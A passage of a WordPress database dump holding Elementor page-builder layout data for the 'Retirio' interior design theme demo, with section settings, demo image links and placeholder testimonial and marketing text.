alse},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3009,4739,'_elementor_page_assets','a:1:{s:6:\"styles\";a:16:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";i:15;s:12:\"e-animations\";}}'),(3010,4739,'_elementor_pro_version','3.8.1'),(3011,38,'_edit_lock','1695380180:3'),(3020,4741,'_wp_page_template','elementor_header_footer'),(3021,4741,'_elementor_edit_mode','builder'),(3022,4741,'_elementor_template_type','wp-page'),(3023,4741,'_elementor_version','3.6.6'),(3024,4741,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Get to know us\",\"title\":\"Most experienced architects & designers\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are certain attributes of a profession and one has to catch hold of them in order to work efficiently and grow in that business. I share my experience as an interior designer, a profession of great esthetic value and charm.\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Mike Hardson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_family\":\"Reey\",\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design 